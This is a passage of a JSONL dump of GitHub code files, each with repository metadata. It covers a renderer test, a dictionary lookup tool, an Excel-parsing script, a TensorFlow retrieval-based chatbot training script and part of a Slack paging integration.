np.array([[0,2,1],[1,2,3]],dtype=np.int32))\nshape_light=shape.Shape(light_vertices,light_indices,None,None,1)\nshapes=[shape_plane,shape_light]\nlight_intensity=torch.from_numpy(\\\n np.array([100000,100000,100000],dtype=np.float32))\nlight=light.Light(1,light_intensity)\nlights=[light]\n\nrender = render_pytorch.RenderFunction.apply\nargs = render_pytorch.RenderFunction.serialize_scene(\\\n cam,materials,shapes,lights,resolution,4,1)\nimg = render(random.randint(0, 1048576), *args)\nimage.imwrite(img.data.numpy(), 'results/heightfield_gan/test.exr')","repo_name":"BachiLi/delta_ray","sub_path":"test/test_heightfield.py","file_name":"test_heightfield.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37807218718","text":"import pickle\nimport readline\n\nwith open('data/table.pkl', 'rb') as f:\n table = pickle.load(f)\n\nwith open('data/freq.pkl', 'rb') as f:\n freq = pickle.load(f)\n\nwith open('data/rev.pkl', 'rb') as f:\n rev = pickle.load(f)\n\n\ndef query_keys(keys):\n if keys[0] == 'r':\n keys = keys[1:]\n if keys in rev:\n return rev[keys]\n else:\n return 'Not in dict'\n elif keys in table:\n res = table[keys]\n res.sort(key=lambda x: -freq[x])\n res = res[:min(10, len(res))]\n return res\n else:\n return 'Not in dict'\n\n\ndef interactive():\n while True:\n keys = input('> ')\n if keys == '':\n continue\n if keys == 'q':\n break\n print(query_keys(keys))\n\n\nif __name__ == '__main__':\n interactive()","repo_name":"amoshyc/ccu-data-engineering","sub_path":"final/model0.py","file_name":"model0.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71895138614","text":"'''\n@ Author - Yogesh Pawar\n@ Creation date - 02/10/2020\n@ Description - SVC Utility\n'''\n\n#1st parameter = requird parameter sheet\n#2nd parameter = excel for data process\n#3rd parameter = which column value end user looking for\n\nimport openpyxl\n# import self\n\nv_input_wb = openpyxl.load_workbook(\"C:/Users/yogesh.pawar/Downloads/Conversion_Maps.xlsx\")\nv_input_sheet = v_input_wb.get_sheet_by_name(\"Sheet1\")\ntotal_rows_input=v_input_sheet.max_row\narr=[]\n# arr.keys()=\ndic={}\nfor i in range(total_rows_input):\n sup_ver=v_input_sheet.cell(row=(i+2), column=2).value\n ret_ver=v_input_sheet.cell(row=(i+2), column=4).value\n maps=v_input_sheet.cell(row=(i+2), column=6).value\n if type(ret_ver)=='int':\n ret_ver=float(ret_ver)\n # reta_version=float(ret_ver)\n print(ret_ver)\n dict_list = str(sup_ver) + \"-\" + str(ret_ver)\n mapsw = str(maps)\n\n dic.update({dict_list:mapsw})\n\n # arr.ap\n # arr.append(dict_list)\n\nprint(dic)\n\n\n# v_processed_wb = openpyxl.load_workbook(process_file_path)\n# v_processed_sheet = v_processed_wb.get_sheet_by_name(\"processed\")\n# total_rows_processed=v_processed_sheet.max_row\n# total_columns_processed=v_processed_sheet.max_column\n#\n# for i in range(int(total_rows_processed)):\n# for j in range(int(total_rows_input)):\n# for k in range(int(total_columns_processed)):\n# if str(v_input_sheet.cell(row=(j+1), column=1).value)==str(v_processed_sheet.cell(row=(i+1), column=(k+1)).value):\n# v_input_sheet.cell(row=(j+1), column=2).value=v_processed_sheet.cell(row=(i+1), column=int(process_file_column_number_to_get_value)).value\n# v_input_wb.save(input_file_path)\n# print(\"Done\")\n#\n# svc_utility_excel_process(\"C:/Users/yogesh.pawar/Desktop/SVC_Shrort_automation/Input.xlsx\",\"C:/Users/yogesh.pawar/Desktop/SVC_Shrort_automation/processed.xlsx\",\"1\")\n","repo_name":"yogeshpawar811/E-Commerce_QB_Setup_Automation","sub_path":"Applications/Workflows/ServiceTimeCard/TaskCategorization/Script/create_dictionary.py","file_name":"create_dictionary.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70437043574","text":"import os\r\nimport time\r\nfrom random import randint\r\nimport collections\r\nfrom utils import *\r\nfrom numpy import *\r\nimport word2vec\r\nimport tensorflow as tf\r\n\r\n### hyper-perameters:\r\ntf.flags.DEFINE_string(\"mode\",\"train\",\"mode\")\r\ntf.flags.DEFINE_string(\"train_path\",\"./Data/Train/train_0\",\"train_path prefix, a split data of source train path\")\r\ntf.flags.DEFINE_string(\"source_train_path\",\"./Data/train.csv\",\"source train path, to build vocabulary\")\r\ntf.flags.DEFINE_string(\"dev_path\",\"./Data/dev.csv\",\"dev_path\")\r\ntf.flags.DEFINE_string(\"test_path\",\"./Data/test.csv\",\"test_path\")\r\ntf.flags.DEFINE_string(\"save_path\",\"./model/0\",\"save_path\")\r\ntf.flags.DEFINE_string(\"voca_path\",\"./voca.txt\",\"voca_path\")\r\ntf.flags.DEFINE_string(\"embedding_path\",\"./Data/embedding.bin\",\"embedding_path\")\r\n\r\nFLAGS = tf.flags.FLAGS\r\n\r\nword_to_id = {}\r\nid_to_word = {}\r\nevalProbs = []\r\ninit = None\r\nvoca_size = 0\r\n\r\nclass Config(object):\r\n\tbatch_size = 200\r\n\tlearning_rate = 0.001\r\n\tkeep_prob = 1.0\r\n\r\n\trnn_dim = 200\r\n\tembedding_size = 200\r\n\r\n\tmax_length_q = 50\r\n\tmax_length_a = 50\r\n\tmax_num_utterance = 10\r\n\r\n\tmax_epoch = 1000\r\n\tmode = FLAGS.mode\r\n\r\ndef getConfig():\r\n\treturn Config()\r\n\r\nconfig = getConfig()\r\neval_config = getConfig()\r\neval_config.keep_prob = 1\r\neval_config.mode = \"dev\"\r\n\r\ndef build_vocab():\r\n\r\n\tvoca_path = FLAGS.voca_path \r\n\tglobal word_to_id, voca_size\r\n\r\n\tif voca_path is not None and os.path.exists(voca_path):\r\n\t\tword_to_id = eval(open(voca_path).read())\r\n\t\tprint(\"Vocabulary size: %d\"%(len(word_to_id)))\r\n\t\tvoca_size = len(word_to_id)\r\n\t\treturn word_to_id\r\n\tcontext, utterance, labels = processUbuntuTrain(FLAGS.source_train_path)\r\n\tdataTuple = [context, utterance]\r\n\tdata = [list(i.reshape(-1)) for i in dataTuple] \r\n\tdata = ' '.join(data).replace(\"\\n\",\"\").split()\r\n\t#print(data)\r\n\tcounter = collections.Counter(data)\r\n\tcount_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\r\n\tcount_pairs = [(a,b) for (a,b) in count_pairs if int(b)>=5]\r\n\r\n\twords, _ = list(zip(*count_pairs))\r\n\tword_to_id = dict(zip(words, range(1, len(words)+1)))\r\n\tword_to_id[\"UNK\"] = len(words)+1\r\n\tword_to_id[\".\"] = 0\r\n\r\n\tif voca_path is not None:\r\n\t\tf = open(voca_path,\"w\")\r\n\t\tf.write(str(word_to_id))\r\n\t\tf.close()\r\n\tprint(\"Vocabulary size: %d\"%(len(word_to_id)))\r\n\tvoca_size = len(word_to_id)\r\n\treturn word_to_id\r\n\r\ndef file_to_id(data, mode = 0):\r\n\tunk = word_to_id[\"UNK\"]\r\n\tinputs = []\r\n\tseq_lengths = []\r\n\tfor sequences in data:\r\n\t\tsequences = sequences.split(\"\\n\")\r\n\t\tsingle_input = []\r\n\t\tseq_length = []\r\n\t\tfor line in sequences:\r\n\t\t\tline = line.split()\r\n\t\t\tll = []\r\n\t\t\tfor word in line:\r\n\t\t\t\tif word in word_to_id:\r\n\t\t\t\t\tll.append(word_to_id[word])\r\n\t\t\t\telse:\r\n\t\t\t\t\tll.append(unk)\r\n\t\t\t\r\n\t\t\tseq_length.append(len(ll))\r\n\t\t\tsingle_input.append(ll)\r\n\r\n\t\tinputs.append(single_input)\r\n\t\tseq_lengths.append(seq_length)\r\n\tif mode == 1:\r\n\t\tinputs = array(inputs).reshape(-1,1)\r\n\t\tseq_lengths = array(seq_lengths).reshape(-1,1)\r\n\treturn inputs, seq_lengths\r\n\r\ndef id_to_sentence(sentence):\r\n\tglobal id_to_word, word_to_id\r\n\tif len(id_to_word)==0:\r\n\t\tid_to_word = {v:k for k,v in word_to_id.items()}\r\n\tresult = [id_to_word[i] for i in sentence ]\r\n\tresult = \"\".join(result)\r\n\treturn result\r\n\r\ndef get_input(mode, path = None):\r\n\r\n\tif mode == \"train\":\r\n\t\tcontext, utterance, labels = processUbuntuTrain(path)\r\n\t\tbuild_vocab()\r\n\t\r\n\telse:\r\n\t\tcontext, utterance, labels = processUbuntuDev(FLAGS.dev_path)\r\n\t\tbuild_vocab()\r\n\r\n\tcontext, _ = file_to_id(context)\r\n\tutterance, seq_length_u = file_to_id(utterance, mode = 1)\r\n\tcontexts, seq_length_c = multi_sequences_padding(context, config)\r\n\tutterance = [i[0] for i in utterance]\r\n\tutterance = pad_sequences(utterance, padding='post', maxlen=config.max_length_q)\r\n\r\n\treturn contexts, utterance, seq_length_c, seq_length_u, labels\r\n\r\ndef produce_input(config, input_q, input_a, seq_length_q, seq_length_a, labels):\r\n\tinput_q = reshape(input_q, [-1])\r\n\tinput_a = reshape(input_a, [-1])\r\n\tseq_length_q = reshape(seq_length_q, [-1])\r\n\tseq_length_a = reshape(seq_length_a, [-1])\r\n\tlabels = reshape(labels, [-1])\r\n\tbatch_size = config.batch_size\r\n\r\n\tdata_len_q = len(input_q)\r\n\tbatch_len_q = data_len_q//config.max_length_q//config.max_num_utterance // batch_size * config.max_length_q * config.max_num_utterance\r\n\tdata_len_a = len(input_a)\r\n\tbatch_len_a = data_len_a//config.max_length_a // batch_size * config.max_length_a\r\n\tinput_q = tf.reshape(input_q[0 : batch_size * batch_len_q],[batch_size, batch_len_q])\r\n\r\n\tseq_length_q = tf.reshape(seq_length_q[0 : batch_size * (batch_len_q//config.max_length_q)], [batch_size, (batch_len_q//config.max_length_q)])\r\n\tinput_a = tf.reshape(input_a[0 : batch_size * batch_len_a],[batch_size, batch_len_a])\r\n\r\n\tseq_length_a = tf.reshape(seq_length_a[0 : batch_size * (batch_len_a//config.max_length_a)],[batch_size, (batch_len_a//config.max_length_a)])\r\n\t\r\n\tlabels = tf.reshape(labels[0: batch_size * (batch_len_a//config.max_length_a)], [batch_size,(batch_len_a//config.max_length_a)])\r\n\t\r\n\tepoch_size = (batch_len_a) // config.max_length_a\r\n\tepoch_size = tf.identity(epoch_size, name=\"epoch_size\")\r\n\r\n\ti = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\r\n\t\r\n\tinput_q = tf.strided_slice(input_q, [0, i * config.max_length_q*config.max_num_utterance], [batch_size, (i + 1) * config.max_length_q*config.max_num_utterance])\r\n\tinput_q = tf.reshape(input_q, [batch_size, config.max_num_utterance, config.max_length_q])\r\n\r\n\tseq_length_q = tf.strided_slice(seq_length_q, [0, i*config.max_num_utterance],[batch_size, (i+1)*config.max_num_utterance])\r\n\tseq_length_q = tf.reshape(seq_length_q, [batch_size, config.max_num_utterance])\r\n\r\n\tinput_a = tf.strided_slice(input_a, [0, i * config.max_length_a], [batch_size, (i + 1) * config.max_length_a])\r\n\tinput_a = tf.reshape(input_a, [batch_size, config.max_length_a])\r\n\r\n\tseq_length_a = tf.strided_slice(seq_length_a, [0, i],[batch_size, i+1])\r\n\tseq_length_a = tf.reshape(seq_length_a, [-1])\r\n\r\n\tlabels = tf.strided_slice(labels, [0, i], [batch_size, (i + 1)])\r\n\tlabels = tf.reshape(labels, [batch_size])\r\n\r\n\treturn input_q, input_a, seq_length_q, seq_length_a, labels\r\n\r\ndef loadEmbedding():\r\n\tglobal voca_size, word_to_id\r\n\tmodel = word2vec.load(FLAGS.embedding_path)\r\n\tembeddingMatrix = zeros( (voca_size, config.embedding_size), dtype=float32)\r\n\twordlist = model.vocab.tolist()\r\n\tfor word, i in word_to_id.items():\r\n\t\tif word in wordlist:\r\n\t\t\tembedding_vector = model[word]\r\n\t\telse:\r\n\t\t\tembedding_vector = zeros((1,config.embedding_size), dtype=float32)\r\n\t\t\tfor character in word:\r\n\t\t\t\tif character in wordlist:\r\n\t\t\t\t\tembedding_vector = embedding_vector + model[character]\r\n\t\t\tembedding_vector = embedding_vector / len(word)\r\n\t\tembeddingMatrix[i] = embedding_vector\r\n\treturn embeddingMatrix\r\n\r\ndef embedding(input_u, input_r):\r\n\tglobal voca_size, init\r\n\tif (FLAGS.embedding_path is not None) and (FLAGS.voca_path is not None):\r\n\t\tinitializer = loadEmbedding()\r\n\t\tembedding = tf.get_variable(name = \"embedding_m\", initializer = initializer )\r\n\telse:\r\n\t\tinitializer = tf.truncated_normal_initializer(stddev=0.01)\r\n\t\tembedding = tf.get_variable(name = \"embedding_m\", shape=(voca_size, config.embedding_size), initializer = initializer )\r\n\r\n\tembedding_u = tf.nn.embedding_lookup(embedding, input_u)\r\n\tembedding_r = tf.nn.embedding_lookup(embedding, input_r)\r\n\r\n\treturn embedding_u, embedding_r\r\n\r\ndef multiTurnResponse(config, embedding_u, embedding_r, seq_length_u, seq_length_r, labels):\r\n\r\n\tdef make_cell(num = 0):\r\n\t\tif num==0:\r\n\t\t\tcell = tf.nn.rnn_cell.GRUCell(config.rnn_dim, kernel_initializer=tf.orthogonal_initializer())\r\n\t\telse:\r\n\t\t\tcell = tf.nn.rnn_cell.GRUCell(num, kernel_initializer=tf.orthogonal_initializer())\t\t\t\r\n\t\tif config.mode==\"train\" and config.keep_prob<1:\r\n\t\t\tcell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=config.keep_prob)\r\n\t\treturn cell\r\n\r\n\tsentence_GRU = make_cell()\r\n\tfinal_GRU = make_cell(50)\r\n\tembedding_us = tf.unstack(embedding_u, num=config.max_num_utterance, axis=1)\r\n\tseq_length_us = tf.unstack(seq_length_u, num=config.max_num_utterance, axis=1)\r\n\tA_matrix = tf.get_variable('A_matrix_v', shape=(config.rnn_dim, config.rnn_dim), initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)\r\n\r\n\tembedding_r = tf.cast(embedding_r, tf.float32)\r\n\tgru_response, _ = tf.nn.dynamic_rnn(sentence_GRU, embedding_r, sequence_length=seq_length_r, dtype=tf.float32, scope='sentence_GRU')\r\n\tembedding_r = tf.transpose(embedding_r, perm=[0, 2, 1])\r\n\tgru_response = tf.transpose(gru_response, perm=[0, 2, 1])\r\n\tmatching_vectors = []\r\n\treuse = None\r\n\tfor embedding_u, seq_length_u in zip(embedding_us, seq_length_us):\r\n\t\tembedding_u = tf.cast(embedding_u, tf.float32)\r\n\t\tmatrix1 = tf.matmul(embedding_u, embedding_r)\r\n\t\tgru_utterance, _ = tf.nn.dynamic_rnn(sentence_GRU, embedding_u, sequence_length=seq_length_u, dtype=tf.float32, scope='sentence_GRU')\r\n\t\tmatrix2 = tf.einsum('aij,jk->aik', gru_utterance, A_matrix)\r\n\t\tmatrix2 = tf.matmul(matrix2, gru_response)\r\n\t\tmatrix = tf.stack([matrix1, matrix2], axis=3, name='matrix_stack')\r\n\r\n\t\tconv_layer = tf.layers.conv2d(matrix, filters=8, kernel_size=(3, 3), padding='VALID',\r\n\t\t\tkernel_initializer=tf.contrib.keras.initializers.he_normal(),\r\n\t\t\tactivation=tf.nn.relu, reuse=reuse, name='conv')\r\n\t\tpooling_layer = tf.layers.max_pooling2d(conv_layer, (3, 3), strides=(3, 3),\r\n\t\t\tpadding='VALID', name='max_pooling') \r\n\t\tmatching_vector = tf.layers.dense(tf.contrib.layers.flatten(pooling_layer), 50,\r\n\t\t\tkernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n\t\t\tactivation=tf.tanh, reuse=reuse, name='matching_v')\r\n\t\tmatching_vectors.append(matching_vector)\r\n\r\n\t\tif not reuse:\r\n\t\t\treuse = True\r\n\r\n\t_, last_hidden = tf.nn.dynamic_rnn(final_GRU, tf.stack(matching_vectors, axis=0, name='matching_stack'), \r\n\t\tdtype=tf.float32, time_major=True, scope='final_GRU') # TODO: check time_major\r\n\tlogits = tf.layers.dense(last_hidden, 2, kernel_initializer=tf.contrib.layers.xavier_initializer(), name='final_v')\r\n\ty_pred = tf.nn.softmax(logits)\r\n\tscore = tf.reduce_max(y_pred, axis = 1)\r\n\tlabel_pred = tf.cast(tf.argmax(y_pred, 1),tf.int32)\r\n\tlabels = tf.cast(labels, tf.int32)\r\n\tacc = tf.reduce_mean(tf.cast(tf.equal(label_pred, labels), tf.float32))\r\n\r\n\tloss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits))\r\n\r\n\treturn score, acc, loss\r\n\r\n\r\nclass Model(object):\r\n\tprobs = None\r\n\tloss = None\r\n\tacc = None\r\n\toptimizer = None\r\n\tepoch_size = 0\r\n\tconfig = None\r\n\tinput_q = None \r\n\tinput_a = None\r\n\tseq_length_q = None\r\n\tseq_length_a = None\r\n\tlabels = None\r\n\r\n\tdef __init__(self, config, input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size):\r\n\t\t\r\n\t\tself.resetInput(input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size)\r\n\t\t\r\n\t\tembedding_q, embedding_a = embedding(self.input_q, self.input_a)\r\n\t\t\r\n\t\tprobs, acc, loss = multiTurnResponse(config, embedding_q, embedding_a, self.seq_length_q, self.seq_length_a, self.labels)\r\n\t\tif config.mode == \"train\":\r\n\t\t\toptimizer = tf.train.AdamOptimizer(config.learning_rate).minimize(loss)\r\n\t\telse:\r\n\t\t\toptimizer = None\r\n\t\tself.probs = probs\r\n\t\tself.loss = loss\r\n\t\tself.acc = acc\r\n\t\tself.optimizer = optimizer\r\n\t\tself.epoch_size = epoch_size\r\n\t\tself.config = config\r\n\r\n\tdef resetInput(self, input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size):\r\n\t\tself.input_q = input_q\r\n\t\tself.input_a = input_a\r\n\t\tself.seq_length_q = seq_length_q\r\n\t\tself.seq_length_a = seq_length_a\r\n\t\tself.labels = labels\r\n\t\tself.epoch_size = epoch_size\r\n\r\n\r\ndef input_model(config, path = None):\r\n\tprint(\"Getting Inputs....\")\r\n\tinput_q, input_a, seq_length_q, seq_length_a, labels = get_input(config.mode, path)\r\n\tprint(\"Getting Inputs Finish\")\r\n\tprint(\"Producing Batches....\")\r\n\tepoch_size = shape(labels)[0]//config.batch_size\r\n\tinput_q, input_a, seq_length_q, seq_length_a, labels = produce_input(config, input_q, input_a, seq_length_q, seq_length_a, labels)\r\n\tprint(\"Producing Batches Finish\")\r\n\r\n\treturn input_q, input_a, seq_length_q, seq_length_a, labels, epoch_size\r\n\r\n\r\ndef run_epoch(model, session):\r\n\tstart_time = time.time()\r\n\tcosts = 0.0\r\n\titers = 0\r\n\tacc = 0.0\r\n\ttotal_loss = 0.0\r\n\tfetches = {\r\n\t\t\"loss\": model.loss,\r\n\t}\r\n\t\r\n\tif model.config.mode == \"train\":\r\n\t\tfetches[\"optimizer\"] = model.optimizer\r\n\t\tfetches[\"acc\"] = model.acc\r\n\telse :\r\n\t\tfetches[\"probs\"] = model.probs\r\n\tfor i in range(model.epoch_size):\r\n\t\tvals = session.run(fetches)\r\n\t\ttotal_loss += vals[\"loss\"]\r\n\t\titers += model.config.max_length_q\r\n\t\t\r\n\t\tif model.config.mode == \"train\":\r\n\t\t\tacc += vals[\"acc\"]\r\n\r\n\t\t\tif i % (model.epoch_size // 10) == 0:\r\n\t\t\t\tprint(\"%.3f cost : %.3f speed: %.1f wps acc: %.3f\" %\r\n\t\t\t\t(\r\n\t\t\t\t\ti * 1.0 / model.epoch_size, \r\n\t\t\t\t\tvals[\"loss\"],\r\n\t\t\t\t\titers * model.config.batch_size / (time.time() - start_time),\r\n\t\t\t\t\tacc / (iters//model.config.max_length_q),\r\n\t\t\t\t))\r\n\r\n\t\telse:\r\n\t\t\tglobal evalProbs\r\n\t\t\tevalProbs += list(vals[\"probs\"])\r\n\r\n\treturn total_loss/model.epoch_size\r\n\r\ndef handleTest():\r\n\tglobal evalProbs\r\n\tevalProbs = evalProbs[:len(evalProbs)-len(evalProbs)%10]\r\n\tevalProbs = reshape(array(evalProbs), [-1,10])\r\n\tprint(evalProbs)\r\n\ttotal = shape(evalProbs)[0]\r\n\tr10_5 = 0.0\r\n\tr10_2 = 0.0\r\n\tr10_1 = 0.0\r\n\tfor i in evalProbs:\r\n\t\tr10_5 += Evaluation(i, 5)\r\n\t\tr10_2 += Evaluation(i, 2)\r\n\t\tr10_1 += Evaluation(i, 1)\r\n\r\n\tprint(\"Accuarcy: 5/10: %.3f 2/10: %.3f 1/10: %.3f \"%(r10_5/total, r10_2/total, r10_1/total))\r\n\tevalProbs = []\r\n\r\n\r\nwith tf.Graph().as_default():\r\n\tt_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size = input_model(config, FLAGS.train_path+\"0\")\r\n\td_input_q, d_input_a, d_seq_length_q, d_seq_length_a, d_labels, d_epoch_size = input_model(eval_config)\r\n\r\n\t#\ttf.reset_default_graph()\t\r\n\tif FLAGS.mode == \"train\":\r\n\t\twith tf.name_scope(\"Train\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=None) as scope:\r\n\t\t\t\ttrainModel = Model(config, t_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size)\r\n\t\t\t\tscope.reuse_variables()\r\n\t\twith tf.name_scope(\"Dev\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=True) as scope:\r\n\t\t\t\tdevModel = Model(eval_config, d_input_q, d_input_a, d_seq_length_q, d_seq_length_a, d_labels, d_epoch_size)\r\n\t\t\r\n\t\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\r\n\t\tconfig_proto = tf.ConfigProto(allow_soft_placement=True)\r\n\t\tsaver = sv.saver\r\n\t\t\r\n\t\twith sv.managed_session(config=config_proto) as session:\r\n\t\t\t\r\n\t\t\tfor i in range(config.max_epoch):\r\n\r\n\t\t\t\tfor j in range(9):\r\n\t\t\t\t\tprint(j)\r\n\t\t\t\t\ttf.reset_default_graph()\r\n\t\t\t\t\tt_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size = input_model(config, FLAGS.train_path+str(j))\r\n\t\t\t\t\ttrainModel.resetInput(t_input_q, t_input_a, t_seq_length_q, t_seq_length_a, t_labels, t_epoch_size)\r\n\r\n\t\t\t\t\tloss = run_epoch(trainModel, session)\r\n\t\t\t\t\t\r\n\t\t\t\t\trun_epoch(devModel, session)\r\n\t\t\t\t\thandleTest()\r\n\t\t\t\tprint(\"Epoch : %d Loss: %.3f \"%(i,loss))\r\n\t\t\t\t\r\n\t\t\t\trun_epoch(devModel, session)\r\n\t\t\t\thandleTest()\r\n\t\t\t\t\r\n\t\t\tif FLAGS.save_path is not None and os.path.exists(FLAGS.save_path):\r\n\t\t\t\tprint(\"Saving model to %s.\" % FLAGS.save_path)\r\n\t\t\t\tsaver.save(session, os.path.join(FLAGS.save_path,\"model.ckpt\"), global_step=sv.global_step)\r\n\r\n\telse:\r\n\t\twith tf.name_scope(\"Train\"):\r\n\t\t\twith tf.variable_scope(\"Model\", reuse=None) as scope:\r\n\t\t\t\ttestModel = build_model(eval_config)\r\n\t\t\t\tscope.reuse_variables()\r\n\r\n\t\tsv = tf.train.Supervisor(logdir=FLAGS.save_path)\r\n\t\tconfig_proto = tf.ConfigProto(allow_soft_placement=True)\r\n\t\tsaver = sv.saver\r\n\t\twith sv.managed_session(config=config_proto) as session:\r\n\t\t\t\r\n\t\t\trun_epoch(testModel, session)\r\n\t\t\thandle_test()","repo_name":"zedom1/nlp","sub_path":"Retrieval-based Chatbot/Multi-Turn Response/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15508,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"43554624296","text":"import json\nfrom uuid import uuid4\n\nfrom django.apps import apps\nfrom django.conf import settings\n\nfrom apps.alerts.models import AlertReceiveChannel, EscalationChain\nfrom apps.alerts.paging import (\n USER_HAS_NO_NOTIFICATION_POLICY,\n USER_IS_NOT_ON_CALL,\n check_user_availability,\n direct_paging,\n)\nfrom apps.slack.constants import PRIVATE_METADATA_MAX_LENGTH\nfrom apps.slack.scenarios import scenario_step\nfrom apps.slack.slack_client.exceptions import SlackAPIException\n\nDIRECT_PAGING_TEAM_SELECT_ID = \"paging_team_select\"\nDIRECT_PAGING_ORG_SELECT_ID = \"paging_org_select\"\nDIRECT_PAGING_USER_SELECT_ID = \"paging_user_select\"\nDIRECT_PAGING_SCHEDULE_SELECT_ID = \"paging_schedule_select\"\nDIRECT_PAGING_TITLE_INPUT_ID = \"paging_title_input\"\nDIRECT_PAGING_MESSAGE_INPUT_ID = \"paging_message_input\"\nDIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID = \"paging_additional_responders_input\"\n\nDEFAULT_TEAM_VALUE = \"default_team\"\n\n\n# selected user available actions\nDEFAULT_POLICY = \"default\"\nIMPORTANT_POLICY = \"important\"\nREMOVE_ACTION = \"remove\"\n\nITEM_ACTIONS = (\n (DEFAULT_POLICY, \"Set default notification policy\"),\n (IMPORTANT_POLICY, \"Set important notification policy\"),\n (REMOVE_ACTION, \"Remove from escalation\"),\n)\n\n\n# helpers to manage current selected users/schedules state\n\nSCHEDULES_DATA_KEY = \"schedules\"\nUSERS_DATA_KEY = \"users\"\n\n\ndef add_or_update_item(payload, key, item_pk, policy):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n metadata[key][item_pk] = policy\n updated_metadata = json.dumps(metadata)\n if len(updated_metadata) > PRIVATE_METADATA_MAX_LENGTH:\n raise ValueError(\"Cannot add entry, maximum exceeded\")\n payload[\"view\"][\"private_metadata\"] = updated_metadata\n return payload\n\n\ndef remove_item(payload, key, item_pk):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n if item_pk in metadata[key]:\n del metadata[key][item_pk]\n payload[\"view\"][\"private_metadata\"] = json.dumps(metadata)\n return payload\n\n\ndef reset_items(payload):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n for key in (USERS_DATA_KEY, SCHEDULES_DATA_KEY):\n metadata[key] = {}\n payload[\"view\"][\"private_metadata\"] = json.dumps(metadata)\n return payload\n\n\ndef get_current_items(payload, key, qs):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n items = []\n for u, p in metadata[key].items():\n item = qs.filter(pk=u).first()\n items.append((item, p))\n return items\n\n\n# Slack scenario steps\n\n\nclass StartDirectPaging(scenario_step.ScenarioStep):\n \"\"\"Handle slash command invocation and show initial dialog.\"\"\"\n\n command_name = [settings.SLACK_DIRECT_PAGING_SLASH_COMMAND]\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n input_id_prefix = _generate_input_id_prefix()\n\n try:\n channel_id = payload[\"event\"][\"channel\"]\n except KeyError:\n channel_id = payload[\"channel_id\"]\n\n private_metadata = {\n \"channel_id\": channel_id,\n \"input_id_prefix\": input_id_prefix,\n \"submit_routing_uid\": FinishDirectPaging.routing_uid(),\n USERS_DATA_KEY: {},\n SCHEDULES_DATA_KEY: {},\n }\n initial_payload = {\"view\": {\"private_metadata\": json.dumps(private_metadata)}}\n view = render_dialog(slack_user_identity, slack_team_identity, initial_payload, initial=True)\n self._slack_client.api_call(\n \"views.open\",\n trigger_id=payload[\"trigger_id\"],\n view=view,\n )\n\n\nclass FinishDirectPaging(scenario_step.ScenarioStep):\n \"\"\"Handle page command dialog submit.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n title = _get_title_from_payload(payload)\n message = _get_message_from_payload(payload)\n private_metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n channel_id = private_metadata[\"channel_id\"]\n input_id_prefix = private_metadata[\"input_id_prefix\"]\n selected_organization = _get_selected_org_from_payload(\n payload, input_id_prefix, slack_team_identity, slack_user_identity\n )\n _, selected_team = _get_selected_team_from_payload(payload, input_id_prefix)\n user = slack_user_identity.get_user(selected_organization)\n\n # Only pass users/schedules if additional responders checkbox is checked\n selected_users, selected_schedules = None, None\n is_additional_responders_checked = _get_additional_responders_checked_from_payload(payload, input_id_prefix)\n if is_additional_responders_checked:\n selected_users = [\n (u, p == IMPORTANT_POLICY)\n for u, p in get_current_items(payload, USERS_DATA_KEY, selected_organization.users)\n ]\n selected_schedules = [\n (s, p == IMPORTANT_POLICY)\n for s, p in get_current_items(payload, SCHEDULES_DATA_KEY, selected_organization.oncall_schedules)\n ]\n\n # trigger direct paging to selected team + users/schedules\n alert_group = direct_paging(\n selected_organization,\n selected_team,\n user,\n title,\n message,\n selected_users,\n selected_schedules,\n )\n\n text = \":white_check_mark: Alert group *{}* created: {}\".format(title, alert_group.web_link)\n\n try:\n self._slack_client.api_call(\n \"chat.postEphemeral\",\n channel=channel_id,\n user=slack_user_identity.slack_id,\n text=text,\n )\n except SlackAPIException as e:\n if e.response[\"error\"] == \"channel_not_found\":\n self._slack_client.api_call(\n \"chat.postEphemeral\",\n channel=slack_user_identity.im_channel_id,\n user=slack_user_identity.slack_id,\n text=text,\n )\n else:\n raise e\n\n\n# OnChange steps, responsible for rerendering form on changed values\n\n\nclass OnPagingOrgChange(scenario_step.ScenarioStep):\n \"\"\"Reload form with updated organization.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n updated_payload = reset_items(payload)\n view = render_dialog(slack_user_identity, slack_team_identity, updated_payload)\n self._slack_client.api_call(\n \"views.update\",\n trigger_id=updated_payload[\"trigger_id\"],\n view=view,\n view_id=updated_payload[\"view\"][\"id\"],\n )\n\n\nclass OnPagingTeamChange(scenario_step.ScenarioStep):\n \"\"\"Set team.\"\"\"\n\n def process_scenario(self, slack_user_identity, slack_team_identity, payload):\n view = render_dialog(slack_user_identity, slack_team_identity, payload)\n 